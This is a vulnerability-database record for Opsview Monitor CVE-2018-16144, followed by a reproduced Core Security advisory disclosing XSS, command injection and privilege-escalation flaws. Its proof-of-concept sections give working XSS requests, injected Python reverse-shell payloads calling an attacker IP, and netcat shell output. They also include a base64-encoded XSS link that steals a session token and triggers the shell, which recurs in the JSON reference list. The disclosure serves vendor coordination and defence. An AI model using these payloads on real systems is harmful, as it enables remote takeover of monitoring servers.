of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16144",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17452",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16144",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"id": "VAR-201809-0902",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
}
]
},
"last_update_date": "2023-12-18T12:01:17.739000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Command Execution Vulnerability (CNVD-2018-17452)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139519"
},
{
"title": "Opsview Monitor Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84505"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.0
},
{
"problemtype": "CWE-77",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%2foiiplzt1c2vybmftzsa9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3zhcib4ahiyid0gbmv3ifhnteh0dhbszxf1zxn0kck7eghymi5vcgvukcdqt1nujywgjy9yzxn0l2nvbmzpzy9ub3rpzmljyxrpb25tzxrob2qvdgvzdg5vdglmawnhdglvbi8nlcb0cnvlktt4ahiylnnldfjlcxvlc3rizwfkzxioingtb3bzdmlldy11c2vybmftzsisihvzzxjuyw1lkttjb25zb2xllmxvzyh1c2vybmftzsk7y29uc29szs5sb2codg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiec1vchn2awv3lxrva2vuiiwgdg9rzw4po3hocjiuc2v0umvxdwvzdehlywrlcigiq29udgvudc1uexbliiwgimfwcgxpy2f0aw9ul2pzb24ikttib2r5id0geyjtzxnzywdlijoivgvzdcbnzxnzywdliiwiy29tbwfuzci6inn1ym1pdf94bxbwx3njcmlwdcisinzhcmlhymxlcyi6w10sinrlc3rfdmfyawfibgvzijpbeyjuyw1lijoiuefhrviilcj2ywx1zsi6ijeymzeymzeymyb8fcbwexrob24glwmgj2ltcg9ydcbzb2nrzxqsc3vichjvy2vzcyxvcztzpxnvy2tldc5zb2nrzxqoc29ja2v0lkfgx0lorvqsc29ja2v0llnpq0tfu1rsrufnkttzlmnvbm5ly3qokfwipgf0dgfja2vysva%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"date": "2018-09-05T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"date": "2018-09-05T17:57:27",
"db": "PACKETSTORM",
"id": "149236"
},
{
"date": "2018-09-05T21:29:02.500000",
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"date": "2018-09-05T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-09-05T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-17452"
},
{
"date": "2019-10-03T00:00:00",
"db": "VULMON",
"id": "CVE-2018-16144"
},
{
"date": "2018-12-11T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"date": "2019-10-03T00:03:26.223000",
"db": "NVD",
"id": "CVE-2018-16144"
},
{
"date": "2019-10-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Opsview Monitor Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010272"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201809-153"
}
],
"trust": 0.6
}
}
VAR-201809-0906
Vulnerability from variot - Updated: 2023-12-18 12:01The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization's network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/
Opsview Monitor Multiple Vulnerabilities
- Advisory Information
Title: Opsview Monitor Multiple Vulnerabilities Advisory ID: CORE-2018-0008 Advisory URL: http://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities Date published: 2018-09-04 Date of last update: 2018-09-04 Vendors contacted: Opsview Release mode: Coordinated release
- Vulnerability Information
Class: Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Improper Neutralization of Special Elements used in an OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144, CVE-2018-16145
- Vulnerability Description
Opsview's website states that:
Opsview[1] builds monitoring software that helps DevOps understand how the performance of their hybrid IT infrastructure & apps impacts business service delivery. Opsview Monitor supports +3500 Nagios plugins and service checks making it easy to monitor everything from Docker and VMware to Amazon Web Services, Hyper-V and more.
- Vulnerable Packages
. Opsview Monitor 5.4 . Opsview Monitor 5.3 . Opsview Monitor 5.2
Other products and versions might be affected, but they were not tested.
- Vendor Information, Solutions and Workarounds
Opsview released the following versions of its product that fix the reported issues. Opsview Monitor 6.0 . Opsview Monitor 5.4.2 . Opsview Monitor 5.3.1
In addition, Opsview published the following release notes:
. https://knowledge.opsview.com/v5.4/docs/whats-new . https://knowledge.opsview.com/v5.3/docs/whats-new
- Credits
These vulnerabilities were discovered and researched by Fernando Diaz and Fernando Catoira from Core Security Consulting Services. The publication of this advisory was coordinated by Leandro Cuozzo from Core Advisories Team.
- Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. In addition, issues presented in 7.3 and 7.4 could allow an attacker to obtain command execution on the system as the nagios user. Finally, the issue found in one of the scripts run during the boot process presented in 7.5 would allow attackers to elevate their privileges from nagios user to root after a system restart, hence obtaining full control of the appliance.
7.1.
The following proof of concept demonstrates the vulnerability:
/----- GET /rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401; auth_tkt=ODFlYjc4YjVlN2M5ZmQ2MDUyNzhlMTEyZTM1ZjRmODM1YWI5ODUzMGFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 -----/
7.2. The following proof of concept demonstrates the vulnerability:
/----- POST /settings/api/router?_dc=1521575692128 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: rifle x-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 506 Cookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256; auth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D Connection: close
[{"action":"SettingsServer","method":"setObjecttypeState","data":["alert(4)","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":2},{"action":"SettingsServer","method":"setObjecttypeState","data":["profile","{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"filters\":[],\"pageSize\":50,\"page\":1}}"],"type":"rpc","tid":3}] -----/
The input will be stored without any sanitization and rendered every time the /settings section is visited by the user. It's important to point that this XSS is self stored and it's executed only in the context of the victim's session. Excerpt of the source code showing the injected script tag:
/----- [{"property":"name","root":"data","direction":"ASC"}]}},"contact":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"name","root":"data"}]}},"alert(4)":{"storeState":{"sorters":[{"root":"data","property":"name","direction":"ASC"}],"pageSize":50,"filters":[],"page":1}},"hostcheckcommand":{"storeState":{"pageSize":50,"filters":[],"page":1,"sorters":[{"direction":"ASC","property":"priority","root":"data"}]}},"netflow_collector":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}],"page":1,"filters":[],"pageSize":50}},"alert(4)":{"storeState":{"sorters":[{"direction":"ASC","root":"data","property":"name"}]," -----/
7.3. Notification abuse leading to remote command execution
[CVE-2018-16146] Opsview Web Management console provides a functionality accessible by an authenticated administrator to test notifications that are triggered under certain configurable events. The 'value' parameter is not properly sanitized, leading to an arbitrary command injection executed on the system with nagios' user privileges.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/notificationmethod/testnotification?_dc=1520444703477 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 376 Cookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0; opsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13; auth_tkt=MDA1M2JmODhmYTlmNWM1NDEyNzM3ZWRiYWJiMTBmZTA1YWEwMWY0M2FkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
{"message":"Test Message","command":"submit_xmpp_script","variables":[],"test_variables":[{"name":"PAGER","value":"123123123 || python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\",16000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"}],"id":"20"} -----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) -----/
Additionally, it is possible to combine this issue with a redirection functionality within the management console and the vulnerability described in 7.1 (Reflected Cross-Site Scripting), to build a specially crafted link that could be sent to an administrator to trigger a reverse shell.
In order to perform the attack, consider the following:
. API's sensitive actions require a 'restToken' to be processed. Abuse the login page redirection functionality to force the user to access the Cross-Site Scripting vulnerable URL described in 7.1 (you may also abuse the Cross-Site scripting vulnerability reported in https://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). If the user is already authenticated he will be automatically redirected. Otherwise, the login page will appear and the redirection will take place after a successful login.
The following proof of concept presents a crafted link that could trigger a reverse shell if accessed by an administrator:
/----- https:///login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%2FOiIpLzt1c2VybmFtZSA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3ZhciB4aHIyID0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7eGhyMi5vcGVuKCdQT1NUJywgJy9yZXN0L2NvbmZpZy9ub3RpZmljYXRpb25tZXRob2QvdGVzdG5vdGlmaWNhdGlvbi8nLCB0cnVlKTt4aHIyLnNldFJlcXVlc3RIZWFkZXIoIngtb3Bzdmlldy11c2VybmFtZSIsIHVzZXJuYW1lKTtjb25zb2xlLmxvZyh1c2VybmFtZSk7Y29uc29sZS5sb2codG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigieC1vcHN2aWV3LXRva2VuIiwgdG9rZW4pO3hocjIuc2V0UmVxdWVzdEhlYWRlcigiQ29udGVudC1UeXBlIiwgImFwcGxpY2F0aW9uL2pzb24iKTtib2R5ID0geyJtZXNzYWdlIjoiVGVzdCBNZXNzYWdlIiwiY29tbWFuZCI6InN1Ym1pdF94bXBwX3NjcmlwdCIsInZhcmlhYmxlcyI6W10sInRlc3RfdmFyaWFibGVzIjpbeyJuYW1lIjoiUEFHRVIiLCJ2YWx1ZSI6IjEyMzEyMzEyMyB8fCBweXRob24gLWMgJ2ltcG9ydCBzb2NrZXQsc3VicHJvY2VzcyxvcztzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKTtzLmNvbm5lY3QoKFwiPGF0dGFja2VySVA%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1 -----/
Once clicked, the authenticated administrator will be redirected to the vulnerable section where his browser will perform a request to the '/settings' endpoint in order to obtain a valid 'restToken'. Finally, using that token, the API request to 'rest/config/notificationmethod/testnotification' will be exploited thus resulting in a reverse shell.
7.4. Rancid test connection functionality abuse leading to command execution
[CVE-2018-16144] NetAudit is a section within Network Analyzer that allows the user to automate the backing up of network devices' configuration files to a centralized location. The test connection functionality is vulnerable to command injection due to an improper sanitization of the 'rancid_password' parameter.
The following proof of concept executes a reverse shell:
/----- POST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https:///settings/ x-opsview-username: admin x-opsview-token: b3d716e0157fd6337e6978220188051d8c578850 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 434 Cookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f; auth_tkt=ZTJlMWFlODQ4ZTVhYmJiN2I3YTQzNWYxNzkzYjAxYWU1YWIxNGI1NWFkbWluIU9QU1ZJRVdfQURNSU4sQUNUSU9OQUxMLEFETUlOQUNDRVNTLEJTTSxDT05GSUdVUkVCU00sQ09ORklHVVJFQlNNQ09NUE9ORU5ULENPTkZJR1VSRUNPTlRBQ1RTLENPTkZJR1VSRUhPU1RHUk9VUFMsQ09ORklHVVJFSE9TVFMsQ09ORklHVVJFS0VZV09SRFMsQ09ORklHVVJFTkVURkxPVyxDT05GSUdVUkVQUk9GSUxFUyxDT05GSUdVUkVST0xFUyxDT05GSUdVUkVTQVZFLENPTkZJR1VSRVZJRVcsREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsRE9XTlRJTUVTT01FLE5BVk9QVElPTlMsTkVUQVVESVRWSUVXLE5FVEZMT1csTk9USUZZU09NRSxQQVNTV09SRFNBVkUsUkVMT0FEQUNDRVNTLFJFUE9SVEFETUlOLFJFUE9SVFVTRVIsUlJER1JBUEhTLFRFU1RBTEwsVEVTVENIQU5HRSxWSUVXQUxMLFZJRVdQT1JUQUNDRVNTIQ%3D%3D Connection: close
ip=++++++&rancid_vendor=1&rancid_username=234234+add+password+xxxxx&rancid_connection_type=telnet&rancid_autoenable=1&rancid_password=2342342342+%3b+sleep%2011%3b%20python+-c+'import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect(("<attackerIP>",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call(["/bin/sh","-i"])%3b'&host_id=2
-----/
/----- nc -lvp 16000 Listening on [0.0.0.0] (family 0, port 16000) Connection from [] port 16000 [tcp/*] accepted (family 2, sport 43016) $ id uid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview) $ uname -a Linux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP Tue Jan 9 23:01:34 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux -----/
7.5. Script modification could allow local privilege escalation
[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios privileges and the scripts that run at boot time, impersonate nagios user during its execution. However, the '/etc/init.d/opsview-reporting-module' script invokes the '/opt/opsview/jasper/bin/db_jasper' script before dropping root privileges.
The following excerpt shows the vulnerable code:
/----- /etc/init.d/opsview-reporting-module:
/opt/opsview/jasper/bin/db_jasper db_exists 2> /dev/null if [ $? != 0 ]; then echo "Attempted to start jasperserver but MySQL credentials are wrong." exit 0 fi
DAEMON=/opt/opsview/jasper/bin/rc.jasperserver
test -x $DAEMON || exit 0
Switch to opsview user if run as root
